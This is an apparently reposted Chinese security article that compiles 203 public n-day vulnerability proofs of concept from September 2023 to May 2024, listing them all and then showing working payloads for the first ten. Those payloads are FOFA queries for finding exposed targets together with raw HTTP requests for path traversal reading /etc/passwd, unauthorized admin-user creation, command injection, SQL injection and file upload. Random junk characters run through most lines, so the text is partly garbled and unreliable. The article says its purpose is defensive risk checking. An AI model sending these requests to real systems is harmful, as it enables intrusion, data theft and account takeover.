互联网公开漏洞整理202309-202406" N2 Y$ H; K; f0 F
道一安全 2024-06-05 07:41 北京2 r! T9 b9 A- ?
以下文章来源于网络安全新视界 ,作者网络安全新视界, `7 d' b0 f+ {' }' q' I9 Z
! w3 ]9 F% g6 I' D$ [ E发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。& y m; ~+ J: H& I( S2 z& n
* b, V6 @# L$ w" u" d2 u1 k3 Z9 s
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
) }0 W% l) f* U- |# |; F
# v5 h7 ^& X( X8 V2 n安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
0 c) y4 b8 v' o% h5 E' f7 _- M% r' o$ B9 I
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
2 T" G# @2 W8 R" Q; z/ X& o/ w7 Y* d# n$ V- X
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
7 }& [; f* I) J E0 M6 Z$ Z6 x: Y2 S& J6 z( B
( y$ S4 ^ p7 k2 i
声明
6 h) U: s c# y" ]' Z5 ]" p6 h4 _6 O" v+ ?5 R6 `6 `- f
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
( c1 d: p1 k8 c. c% N
4 M" Y' B. Y6 H! E6 x' N有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。 Y6 @* K0 x! a+ C' p! W) y% g+ J& D: \
6 ]$ r& ?' L/ ?
; E* Q F3 u n; t
$ J W1 `/ n* F5 L目录
. o' N+ _: @) I7 L4 N( n! x6 n6 S, Z7 _
01
+ `6 e% L' F$ z+ W+ v/ @0 ~' y/ x! { G
1. StarRocks MPP数据库未授权访问) P. @- c B+ U1 s+ Y- a
2. Casdoor系统static任意文件读取
% @$ M. U$ M6 T+ U x- j- S3. EasyCVR智能边缘网关 userlist 信息泄漏
1 z$ F: z# Q' y& g5 ^# Y+ u1 P F4. EasyCVR视频管理平台存在任意用户添加
3 q7 k, ~& P7 I$ Y$ {5. NUUO NVR 视频存储管理设备远程命令执行2 d' f# b, v/ _ z6 s. G
6. 深信服 NGAF 任意文件读取1 C5 y, z7 V* x# F8 _3 v
7. 鸿运主动安全监控云平台任意文件下载8 H" I- m1 s- |3 p$ A3 k
8. 斐讯 Phicomm 路由器RCE% f4 Y5 X7 N. K
9. 稻壳CMS keyword 未授权SQL注入1 E% ~ {/ U2 a+ f) f
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
G) l( \3 n- U9 U8 Q( N11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入1 U6 U& F n$ O; Z
12. Jorani < 1.0.2 远程命令执行9 Y6 U2 v3 K4 ^! v4 D& [2 q+ M* b
13. 红帆iOffice ioFileDown任意文件读取
$ m3 J9 [! t' E% ^" M$ x6 ~14. 华夏ERP(jshERP)敏感信息泄露4 [" O& {' K% c; v$ z
15. 华夏ERP getAllList信息泄露
1 \7 c9 ^# B$ y0 A. e16. 红帆HFOffice医微云SQL注入. w, Q+ U3 w8 X! q8 [3 n# |
17. 大华 DSS itcBulletin SQL 注入
: y( w1 R+ b% [' ~4 r18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
( M3 H/ L' u1 ?3 O% M19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入! @5 L: z$ }- a M3 q% W
20. 大华ICC智能物联综合管理平台任意文件读取$ R7 g3 l8 j: u6 s1 R6 c; w2 l1 X6 q
21. 大华ICC智能物联综合管理平台random远程代码执行
5 y8 t6 b; {- D" r1 A22. 大华ICC智能物联综合管理平台 log4j远程代码执行2 H0 L" g L1 N+ x
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行3 Y; g* _# g9 ?% E
24. 用友NC 6.5 accept.jsp任意文件上传3 e } c1 o7 {2 |1 {
25. 用友NC registerServlet JNDI 远程代码执行0 X+ e8 l% g6 N0 s7 T
26. 用友NC linkVoucher SQL注入
/ E2 d: j7 S7 K8 }( K& L3 U27. 用友 NC showcontent SQL注入( U# A" v! \# k* J2 Z
28. 用友NC grouptemplet 任意文件上传+ W! d* b7 h' Q
29. 用友NC down/bill SQL注入1 M' u" n9 P8 {3 X/ n
30. 用友NC importPml SQL注入9 Z3 U+ g- N7 @ }# a. o A" ]
31. 用友NC runStateServlet SQL注入
, r* `4 L4 L, M0 `4 o; J32. 用友NC complainbilldetail SQL注入2 v% S& o- t% n5 A: i+ N! e8 N
33. 用友NC downTax/download SQL注入; n/ p0 k8 Y! H1 z1 s2 a1 [8 Z
34. 用友NC warningDetailInfo接口SQL注入9 w$ M% ?/ K+ t f3 G
35. 用友NC-Cloud importhttpscer任意文件上传8 U) y7 Y- L4 D$ |0 `/ T$ i
36. 用友NC-Cloud soapFormat XXE
3 t7 S6 M1 M, d, r9 H37. 用友NC-Cloud IUpdateService XXE
5 f" U9 G% i4 \. ?' g& g38. 用友U8 Cloud smartweb2.RPC.d XXE
0 z% n" m! m4 q3 X3 u0 q. N39. 用友U8 Cloud RegisterServlet SQL注入
4 v+ X; l* b) R I* A' X7 c6 \40. 用友U8-Cloud XChangeServlet XXE
# v9 \# p1 \+ A8 E$ `# d41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
8 ]6 \* s0 h! J4 L42. 用友GRP-U8 SmartUpload01 文件上传9 ~% X5 \8 Z6 @! Y: j
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
- q- f& W; e" @7 `% B; ~: Q44. 用友GRP-U8 bx_dj_check.jsp SQL注入$ W& o- t8 O: r/ f6 S8 V
45. 用友GRP-U8 ufgovbank XXE
' G v, s z1 u2 ?7 @" ^46. 用友GRP-U8 sqcxIndex.jsp SQL注入
6 D! y* @ N% E7 `47. 用友GRP A++Cloud 政府财务云 任意文件读取
3 ~ Q* w- l: m7 _7 r5 K' k5 F5 y48. 用友U8 CRM swfupload 任意文件上传/ p5 k* J& B( O( w) b w4 _
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
2 W3 c: `8 W' F, ^- A# z1 U ^50. QDocs Smart School 6.4.1 filterRecords SQL注入# I# x- N# h- i4 r
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入; F# ^, }, K' N
52. 泛微E-Office json_common.php sql注入: i; P' B2 L% L! V5 G, Q) l7 s
53. 迪普 DPTech VPN Service 任意文件上传
% e) _; _# P: E1 n% j* }* v. v2 d54. 畅捷通T+ getstorewarehousebystore 远程代码执行/ S# N N0 n+ A" g. Q$ T7 y+ W; y
55. 畅捷通T+ getdecallusers信息泄露
7 B6 b9 G5 e, `' P56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
3 @' e7 Y5 B. ]/ |2 Q57. 畅捷通T+ keyEdit.aspx SQL注入
0 n: q" O( r/ \1 k& F& n58. 畅捷通T+ KeyInfoList.aspx sql注入
2 v* \5 y$ p8 z7 t59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
" U; K0 x- m# [60. 百卓Smart管理平台 importexport.php SQL注入
& Z0 _+ j: m8 [5 p61. 浙大恩特客户资源管理系统 fileupload 任意文件上传/ c, e/ J2 ~" A& m2 k
62. IP-guard WebServer 远程命令执行# X1 l7 f3 l4 h% b
63. IP-guard WebServer任意文件读取
7 `8 m: @# W) i: J/ X& F, h0 q7 y64. 捷诚管理信息系统CWSFinanceCommon SQL注入. L" Q* U, M- B% x; Y0 r9 f8 N
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
; U2 I7 ^* ], u8 Y0 s% n% D66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
; N& ?$ S7 g8 d' x67. 万户ezOFFICE wpsservlet任意文件上传# D @& P/ b4 L. B9 z6 b
68. 万户ezOFFICE wf_printnum.jsp SQL注入9 M. e2 i; N, F+ N
69. 万户 ezOFFICE contract_gd.jsp SQL注入+ a- G* u" I2 n7 H i& A
70. 万户ezEIP success 命令执行0 H6 [) k5 ^3 Q/ j0 b
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入) R ^; R% W4 k" Y( L( H; r' s& C
72. 致远OA getAjaxDataServlet XXE: x( G/ M# N, j) k$ i
73. GeoServer wms远程代码执行
4 _* Z; {: ~6 d( B% B5 m74. 致远M3-server 6_1sp1 反序列化RCE
5 ]- l$ x( [8 b$ U+ A/ ]8 U7 J75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE6 U) D `# L$ P$ K8 K2 G9 M
76. 新开普掌上校园服务管理平台service.action远程命令执行/ M H2 ]5 b* v& m
77. F22服装管理软件系统UploadHandler.ashx任意文件上传% f6 ?2 i* ~0 ^9 w
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传 p$ D# \$ m- e9 Z4 A9 m
79. BYTEVALUE 百为流控路由器远程命令执行7 _7 n: g& ]! |5 {8 @
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
. \) F/ |+ k ]% v81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露5 s% Y3 w" f' m- A6 w
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行: n. T* _: ?. t, _# H
83. JeecgBoot testConnection 远程命令执行6 d: Z* z: c* b
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
/ D2 _* |( B( q5 f x85. SysAid On-premise< 23.3.36远程代码执行 w H( w) G7 B+ X6 w3 G
86. 日本tosei自助洗衣机RCE% {$ F; J6 q# P
87. 安恒明御安全网关aaa_local_web_preview文件上传
6 X7 l; k7 K2 L3 W5 S88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 i; f8 j- U! m5 j89. 致远互联FE协作办公平台editflow_manager存在sql注入2 D4 t; \) A" A2 x2 i
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行4 o# e T1 o& w3 { r/ d
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取& Y( I7 q4 c! L$ O" J$ W
92. 海康威视运行管理中心session命令执行
! h8 A+ z; e9 `9 ~/ g! q93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
3 R* t7 n) V: n$ L3 Y( E94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
$ B! Z" D3 P& \. c2 ^" M, p95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
8 w' t8 s/ g& X0 Y* u8 H96. Apache OFBiz 18.12.11 groovy 远程代码执行
. u# |1 r+ [! ]" i$ r& u! E97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
, c: r5 ^3 G0 S98. SpiderFlow爬虫平台远程命令执行
" r- d1 I' W6 v/ s9 d3 w6 `99. Ncast盈可视高清智能录播系统busiFacade RCE
0 Y3 `5 Y: ?5 Z- f: O/ l100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
, _0 h0 P) w; w101. ivanti policy secure-22.6命令注入2 N3 ?* x, }% }0 K8 d# l# M7 h: l
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行% c% Y" U* ` C% _* k
103. Ivanti Pulse Connect Secure VPN XXE
: E! E6 E5 e4 C7 _ m5 q/ m4 i104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露1 w1 u5 p. U* N7 Q$ M. q
105. SpringBlade v3.2.0 export-user SQL 注入) Q9 x! Q' g, Q$ F. h2 f
106. SpringBlade dict-biz/list SQL 注入# A8 v. W% M: u' v7 e' I1 A, `
107. SpringBlade tenant/list SQL 注入
8 [' `: [; t0 [9 B& w' V108. D-Tale 3.9.0 SSRF
; t8 {: j& G3 |3 @109. Jenkins CLI 任意文件读取
0 j# T7 j* G/ Y1 l110. Goanywhere MFT 未授权创建管理员" z! _; K I# `
111. WordPress Plugin HTML5 Video Player SQL注入
/ v9 s: d% b [1 q112. WordPress Plugin NotificationX SQL 注入
, V, T/ c+ z" i$ F X113. WordPress Automatic 插件任意文件下载和SSRF" v' L! O$ f% l" V/ Z3 F
114. WordPress MasterStudy LMS插件 SQL注入
: H) v* M& N" k$ W' w3 B Q115. WordPress Bricks Builder <= 1.9.6 RCE
m' w7 [% a/ P- C" e% V' R116. wordpress js-support-ticket文件上传
+ O [ M! N8 u- N' { ]117. WordPress LayerSlider插件SQL注入
( ]) F f+ L0 ~+ d118. 北京百绰智能S210管理平台uploadfile.php任意文件上传: U3 \4 C2 S/ M& ^+ ?
119. 北京百绰智能S20后台sysmanageajax.php sql注入( M+ r1 ]0 S5 _# z/ |8 |* B
120. 北京百绰智能S40管理平台导入web.php任意文件上传. _0 ?, H# y9 ]0 K! V: H$ B8 r3 P
121. 北京百绰智能S42管理平台userattestation.php任意文件上传0 V) O+ `" V$ M$ [7 {* M. y
122. 北京百绰智能s200管理平台/importexport.php sql注入$ T5 y( U& H* Q) B: l$ |% ]
123. Atlassian Confluence 模板注入代码执行% ~! |; }( ^6 L8 q3 a
124. 湖南建研工程质量检测系统任意文件上传, ?2 H8 Z! U$ f" r& Y' O7 a! C
125. ConnectWise ScreenConnect身份验证绕过6 y. H' k- r( R) I# d7 ?9 k* R
126. Aiohttp 路径遍历% V( D7 e1 `- b( H+ @' Z
127. 广联达Linkworks DataExchange.ashx XXE
& x. K, J" B+ ~# S6 E128. Adobe ColdFusion 反序列化
# n" x# q$ d' p1 r# T5 z7 V129. Adobe ColdFusion 任意文件读取& C: ]- z: r/ Q+ x2 [3 G: a, w) L: o
130. Laykefu客服系统任意文件上传5 Z5 g7 [& l% e& Y8 |2 R6 @/ O0 o
131. Mini-Tmall <=20231017 SQL注入; K+ [$ x" a. h) H
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过: j6 }; X% n# [2 r& L
133. H5 云商城 file.php 文件上传
4 c5 S9 e* v% _3 |( o( Q134. 网康NS-ASG应用安全网关index.php sql注入
9 C* l: E! U2 v. U9 }135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入. X% y' \6 k# F# Q7 L5 \# L- T
136. NextChat cors SSRF
. I' [) N+ t/ J( j137. 福建科立迅通信指挥调度平台down_file.php sql注入9 \+ P9 G* u/ d% B$ G( |
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入+ A) P! p0 A& u% ~- i6 `: F
139. 福建科立讯通信指挥调度平台editemedia.php sql注入; \. p& |, W+ u6 K
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入- ~0 c$ c( v' C9 K4 Y
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
0 C9 K5 `/ M* n; H4 E" k142. CMSV6车辆监控平台系统中存在弱密码8 j& Z9 b5 I- \* s5 [+ A. r
143. Netis WF2780 v2.1.40144 远程命令执行
) L9 H+ H6 h& {) {- S+ c4 o' k144. D-Link nas_sharing.cgi 命令注入# y9 s7 C- g0 {0 N6 ]
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
/ x( \6 L, |+ Z# ~- k$ P146. MajorDoMo thumb.php 未授权远程代码执行
" C% B4 ]) \$ h# |( x; d147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
2 k6 |, A; s1 F/ {! Y148. CrushFTP 认证绕过模板注入: {2 f2 E7 z) k4 v7 ^
149. AJ-Report开源数据大屏存在远程命令执行5 W6 M* `* C$ s6 ]; n1 k
150. AJ-Report 1.4.0 认证绕过与远程代码执行
% V" ^* d. r T" R151. AJ-Report 1.4.1 pageList sql注入
! _% G. m% m0 j5 p152. Progress Kemp LoadMaster 远程命令执行
! Z4 Q9 [5 A6 ^8 c5 W4 \7 l/ _153. gradio任意文件读取, A4 k. _9 ~$ c; D7 T# Q
154. 天维尔消防救援作战调度平台 SQL注入0 f# u9 q$ L3 \+ n
155. 六零导航页 file.php 任意文件上传
# q5 g( t& L- T& F9 `156. TBK DVR-4104/DVR-4216 操作系统命令注入
* z; I+ k& E( l+ x$ E$ @5 q- }7 c157. 美特CRM upload.jsp 任意文件上传
" d9 U1 l9 M4 W8 v* b158. Mura-CMS-processAsyncObject存在SQL注入) b9 R1 Y @$ K' ?' n% w( a
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传1 o9 k- K9 `5 c J
160. Sonatype Nexus Repository 3目录遍历与文件读取/ Q& ]$ P( v" j% ^6 E! H# |& m" b \
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传- E( o5 c. B7 E
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
7 u& E( o" {. r$ I/ E/ _& s163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
2 `6 R5 }) V' w5 a7 ^/ P& s164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传2 S8 A( {4 Y* I0 O o
165. OrangeHRM 3.3.3 SQL 注入/ N% _% Q' o8 N2 `( A7 U9 G
166. 中成科信票务管理平台SeatMapHandler SQL注入- [, T7 _0 j6 p
167. 精益价值管理系统 DownLoad.aspx任意文件读取" {: l- K/ G& a! e
168. 宏景EHR OutputCode 任意文件读取
; H9 E* X) C! f4 F$ l: m3 g169. 宏景EHR downlawbase SQL注入
$ I/ @( m4 Y' s6 f0 ^6 _* j9 `9 N/ E170. 宏景EHR DisplayExcelCustomReport 任意文件读取* K8 s) G% C# S* o+ S: b* O; U
171. 通天星CMSV6车载定位监控平台 SQL注入
" n* i" D2 B: o- n/ N) k172. DT-高清车牌识别摄像机任意文件读取# M! k4 ^1 F* t/ L% D" C
173. Check Point 安全网关任意文件读取& j6 c( m+ x0 }) d/ v% b2 G0 M, p
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
7 ~+ N& _% [7 V175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入+ G y3 u+ Z% V: G
176. 电信网关配置管理系统 rewrite.php 文件上传
6 \8 R C& |# C* o5 E177. H3C路由器敏感信息泄露6 r7 U; P) i6 p5 n: p. w1 h; g# D# p" a
178. H3C校园网自助服务系统-flexfileupload-任意文件上传7 K& Z8 B9 W% ^3 J
179. 建文工程管理系统存在任意文件读取# ]# ?1 l" u' R3 Z5 v4 @6 G
180. 帮管客 CRM jiliyu SQL注入
4 D \& w0 G7 _4 \181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入' N$ M# s6 \" _5 n# W
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
' _* ^. E' j" Y: ^183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入" ~5 c& L7 l% _+ I1 F" h
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
, _! J: i) Q) I4 {! s185. 瑞友天翼应用虚拟化系统SQL注入9 N, [; w0 q% [
186. F-logic DataCube3 SQL注入% `7 q# ?9 U1 ]9 ]9 R8 V8 v
187. Mura CMS processAsyncObject SQL注入+ d* j4 `9 D2 l8 s2 l% U0 O4 Y
188. 叁体-佳会视频会议 attachment 任意文件读取
. x/ N8 c# i6 O" O4 F% M5 t# \. w2 o3 e189. 蓝网科技临床浏览系统 deleteStudy SQL注入
( c" T/ m# o6 U$ j0 s$ b) p190. 短视频矩阵营销系统 poihuoqu 任意文件读取; W# K0 B" J/ ?' z r
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入. P7 v4 c; l! k/ K) ^+ n; B
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传" ^1 Z, m& \: U& F
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
4 _$ @( s- }9 B! P) s- \- v194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
8 M! A& b A! b2 }3 I" q195. 飞鱼星上网行为管理系统 send_order.cgi命令执行0 k/ J/ d* A% B M
196. 河南省风速科技统一认证平台密码重置
! Q9 I& C v; c$ f8 Q& Z( n197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入0 I: p. J L' _$ W4 P! R j& F- K
198. 阿里云盘 WebDAV 命令注入7 `& T1 U0 U2 L2 p: f
199. cockpit系统assetsmanager_upload接口 文件上传% B2 \+ c2 m& i2 O% E6 b; H
200. SeaCMS海洋影视管理系统dmku SQL注入% d) H) B* @2 r( u6 V
201. 方正全媒体新闻采编系统 binary SQL注入
; ?( @3 _; i u0 e! |202. 微擎系统 AccountEdit任意文件上传% s1 k. z' j& E- r( q; {+ I
203. 红海云EHR PtFjk 文件上传9 _9 _8 ^* b! L! h0 |- r
4 E- D/ T' {" H. n& N
POC列表; h7 N# \% `$ Z- }7 u
6 i. i' P( S" q. b* t% _+ _( X
02, H! Q& Q! j5 M; c
- ^ T$ l0 [ {7 b# X1. StarRocks MPP数据库未授权访问
$ ^( u4 s, F1 O0 k$ SFOFA :title="StarRocks", P/ _1 C: b5 T2 h
GET /mem_tracker HTTP/1.1
$ w& f5 n: @% @) Y' _5 d# ~Host: URL
4 ^& d5 Z- R, Q* `. A# b% W% f d" W
0 g! r5 N5 b# J" ~, s8 U9 T4 A2. Casdoor系统static任意文件读取
( w+ j0 t9 {# I' U# @. _FOFA :title="Casdoor"4 y/ l- e; P5 b8 e* M8 E; S
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
, s- a& M J( Y6 ZHost: xx.xx.xx.xx:9999
6 u5 r0 f7 ^ F( W/ v9 fUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( C& X- T; f3 g( z6 O: n B
Connection: close+ C6 F: `* ?: x- X; u3 Y" C
Accept: */*7 S7 ^. I. K% z; u' ]& X
Accept-Language: en
1 a, Z, U+ K6 M# |1 U5 ?* dAccept-Encoding: gzip
* O; t* ?- M0 V3 @7 \
9 H1 p$ ]8 B4 A- \( Y
6 T) O' S8 Y1 |$ s. c7 |, d n3. EasyCVR智能边缘网关 userlist 信息泄漏
5 ]3 e9 ]4 t# @4 |1 b& IFOFA :title="EasyCVR"
: d: I6 A7 [/ W- VGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
) K8 B4 a' }' V% JHost: xx.xx.xx.xx
# Q. M+ X( ^& j/ c
8 M0 A- |4 i# J: K% m9 `9 H$ ]" O4 _$ b$ X. _; V' N3 R* ~; ~9 E ?
4. EasyCVR视频管理平台存在任意用户添加
& w4 _1 w8 w# W7 I0 }- g, NFOFA :title="EasyCVR"& s5 ?" v2 q9 s, W+ Z: L! i
" V* Q' e/ W) x% I, u
password更改为自己的密码md5
# {% R# q$ B+ n& R3 R) I' `POST /api/v1/adduser HTTP/1.1
7 U4 [; B6 ?/ o# b* S: ~; RHost: your-ip: g; C8 v4 o1 Q" M9 N) _6 C
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ g( w, x# a% o h2 k* |3 ^; o s+ j! O- Z( V# W
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1. N9 j! j9 V% p3 t6 n
5 S, \$ R# |$ E2 W
$ f% ?: R5 ]& Z/ a4 M
5. NUUO NVR 视频存储管理设备远程命令执行
9 T2 L. O2 J0 L" ^/ Q# dFOFA:title="Network Video Recorder Login"
6 v6 v v) O! Z/ `0 }GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
( n+ h0 F+ k1 M& ?8 T: aHost: xx.xx.xx.xx
7 e g" X7 u6 O$ \. f
8 V9 B8 q E6 k' w) G* r7 `5 ?' E: w4 X7 r7 d
6. 深信服 NGAF 任意文件读取 S& n* S5 ^' |$ p" l) z6 p C8 u, R
FOFA:title="SANGFOR | NGAF"
! b- s3 }* H; P5 ?0 QGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1& ]5 m% ]' B; Y! A0 F% F
Host:. ^+ ]) E% w( l) @" k* b8 j9 O3 `
6 a/ ~1 V1 k# b8 X8 k
3 x9 e m( x- l. _& B6 k& f7. 鸿运主动安全监控云平台任意文件下载
3 E8 a5 G$ P" _3 U4 H* nFOFA:body="./open/webApi.html"
- j5 K. L% O9 g7 J- o' R1 ^4 kGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.19 {& }! `: r: x1 M: j7 z6 H6 t( q& ]
Host:
* x* k$ O0 w9 R! j3 G- Q* a: f% L! y" R( V' {2 Y5 t' i, r- ~$ S
: E6 u6 S5 s8 Y$ {) s5 W& W# z
8. 斐讯 Phicomm 路由器RCE, U6 X$ A+ P+ ?( T6 M! B1 z
FOFA:icon_hash="-1344736688"
q9 A. X9 m2 P; r# ]9 ?默认账号admin登录后台后,执行操作/ ]1 B( h! s, S) ]/ ~0 h
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
. E4 p: @$ [9 F% s# _. OHost: x.x.x.x9 K( |! r8 {) |+ V3 D: d x
Cookie: sysauth=第一步登录获取的cookie
: [# P4 b- Q* l0 X- b$ [2 fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz4 j% ^( a' H7 ?
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36/ B9 j! ^* [; ]% m1 |8 K" h: n
3 h j$ h& I" H
------WebKitFormBoundaryxbgjoytz" A0 J) h5 H/ T7 I
Content-Disposition: form-data; name="wifiRebootEnablestatus" a: i. B1 j) K: d1 P: q" o
& T9 o7 j9 j+ B
%s
: }6 Y4 F) G/ R; D# {6 R$ W------WebKitFormBoundaryxbgjoytz
4 D2 Y) f4 R+ \# T4 W2 UContent-Disposition: form-data; name="wifiRebootrange"* x' L, P4 H8 x
" F$ N& S; I- ^, q" ?% a12:00; id;
. t4 p) [4 ^% T5 l% |) U------WebKitFormBoundaryxbgjoytz
+ h! X/ o, {& @% `Content-Disposition: form-data; name="wifiRebootendrange"
$ |! O; g; F I1 b0 l, {" O% Z6 q% x j! L y
%s:
5 D V) H; e/ A0 S# a7 P9 ~------WebKitFormBoundaryxbgjoytz
! B- K" u" p% d6 ?Content-Disposition: form-data; name="cururl2"
# L% ^0 W5 _7 P4 j( \
/ z& {3 I3 n. L ?& L5 }
* }( B. C$ ] o- w! g7 q/ X) G------WebKitFormBoundaryxbgjoytz--
8 T. V. b8 g$ J* s7 u/ Z) w6 _* H
7 Q: V0 \& Q( X
3 Q, `; K( [2 ^* R% E! c5 C9. 稻壳CMS keyword 未授权SQL注入" `6 A& ]! x6 `
FOFA:app="Doccms"& X1 i. I* d& s( I. R( X+ N
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
' ]8 x$ }8 C1 t4 W/ U$ nHost: x.x.x.x
6 V, o4 U: a+ S2 N% C5 j
3 M: t9 d) h F3 e* G3 r" X6 X6 O: y1 f( f8 {1 `
payload为下列语句的二次Url编码
4 W3 P, O1 b) w/ Q, ]$ f, v( T4 ^1 Z) I$ M6 Z
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#+ [/ [) ]1 s) z, H# p2 j" N7 }
. Z- N$ d/ t. v7 ^! [
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
# |5 _& g6 c9 C4 A1 \0 w! X I. EFOFA:icon_hash="953405444"
# L j8 ~: a8 e" s. p: o" b- V, t6 S b$ X4 u
文件上传后响应中包含上传文件的路径% Z/ \1 p3 F0 R+ O
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
; R* @$ W+ }( h' y" ]- lHost: x.x.x.x:xx2 b' T" M, h5 i( A5 F& T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 L9 ~7 I# a7 t! i. p, F- U/ |& r
Content-Length: 197/ ]8 X; V3 F E$ a+ i4 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 |7 b" `8 u! r9 l9 ^Accept-Encoding: gzip, deflate( x5 A9 J; W- n. V7 e
Accept-Language: zh-CN,zh;q=0.9
' M0 q% Q* f! i6 c- @Connection: close
7 J% \) y' i1 g6 D5 A, @% ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
8 G) p6 V6 j# r; N' r
3 Z# {: G1 E1 O5 A+ P: l: s------WebKitFormBoundaryxdgaqmqu
4 V6 Z5 o! F& U( j) rContent-Disposition: form-data; name="file"filename="icfitnya.txt"9 G2 z, \ u2 e r8 R- V: W" c
Content-Type: text/html
+ K2 f: \0 {/ @; D0 @. ]5 ^( K1 q$ T* e. z; A1 b' _- O
jmnqjfdsupxgfidopeixbgsxbf! h8 N6 U _) Z( M v* d! X( n$ [1 E
------WebKitFormBoundaryxdgaqmqu--' f ]. Z5 e" B" w3 u; t$ K
9 {# u8 K* {- q! y8 t
/ K& S* V: x' t1 q11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
